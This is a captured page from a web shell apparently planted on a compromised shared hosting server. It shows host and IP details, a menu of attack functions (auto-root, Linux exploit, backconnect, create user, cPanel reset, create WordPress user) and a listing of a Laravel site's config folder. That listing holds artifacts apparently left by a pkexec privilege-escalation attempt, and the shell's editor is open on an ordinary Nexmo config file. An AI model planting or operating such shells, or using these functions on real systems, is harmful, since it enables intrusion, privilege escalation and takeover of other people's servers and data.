Linux host40.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Apache
: 68.65.120.213 | : 216.73.216.131
Cant Read [ /etc/named.conf ]
7.4.33
trade
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
trade /
doctor.tradesense.co.ke /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
app.php
9.23
KB
-rw-r--r--
auth.php
3.71
KB
-rw-r--r--
broadcasting.php
1.56
KB
-rw-r--r--
cache.php
3.03
KB
-rw-r--r--
cors.php
823
B
-rw-r--r--
database.php
4.94
KB
-rw-r--r--
dompdf.php
10.14
KB
-rw-r--r--
filesystems.php
2.63
KB
-rw-r--r--
flare.php
1.38
KB
-rw-r--r--
hashing.php
1.53
KB
-rw-r--r--
ignition.php
4.35
KB
-rw-r--r--
installer.php
5.16
KB
-rw-r--r--
logging.php
2.83
KB
-rw-r--r--
mail.php
3.29
KB
-rw-r--r--
nexmo.php
2.4
KB
-rw-r--r--
purifier.php
4.25
KB
-rw-r--r--
queue.php
2.7
KB
-rw-r--r--
services.php
950
B
-rw-r--r--
session.php
6.88
KB
-rw-r--r--
tinker.php
1.47
KB
-rw-r--r--
trustedproxy.php
1.67
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : nexmo.php
<?php return [ /* |-------------------------------------------------------------------------- | API Credentials |-------------------------------------------------------------------------- | | If you're using API credentials, change these settings. Get your | credentials from https://dashboard.nexmo.com | 'Settings'. | */ 'api_key' => function_exists('env') ? env('NEXMO_KEY', '') : '', 'api_secret' => function_exists('env') ? env('NEXMO_SECRET', '') : '', /* |-------------------------------------------------------------------------- | Signature Secret |-------------------------------------------------------------------------- | | If you're using a signature secret, use this section. This can be used | without an `api_secret` for some APIs, as well as with an `api_secret` | for all APIs. | */ 'signature_secret' => function_exists('env') ? env('NEXMO_SIGNATURE_SECRET', '') : '', /* |-------------------------------------------------------------------------- | Private Key |-------------------------------------------------------------------------- | | Private keys are used to generate JWTs for authentication. Generation is | handled by the library. JWTs are required for newer APIs, such as voice | and media | */ 'private_key' => function_exists('env') ? env('NEXMO_PRIVATE_KEY', '') : '', 'application_id' => function_exists('env') ? env('NEXMO_APPLICATION_ID', '') : '', /* |-------------------------------------------------------------------------- | Application Identifiers |-------------------------------------------------------------------------- | | Add an application name and version here to identify your application when | making API calls | */ 'app' => ['name' => function_exists('env') ? env('NEXMO_APP_NAME', 'NexmoLaravel') : 'NexmoLaravel', 'version' => function_exists('env') ? env('NEXMO_APP_VERSION', '1.1.2') : '1.1.2'], /* |-------------------------------------------------------------------------- | Client Override |-------------------------------------------------------------------------- | | In the event you need to use this with nexmo/client-core, this can be set | to provide a custom HTTP client. | */ 'http_client' => function_exists('env') ? env('NEXMO_HTTP_CLIENT', '') : '', ];
Close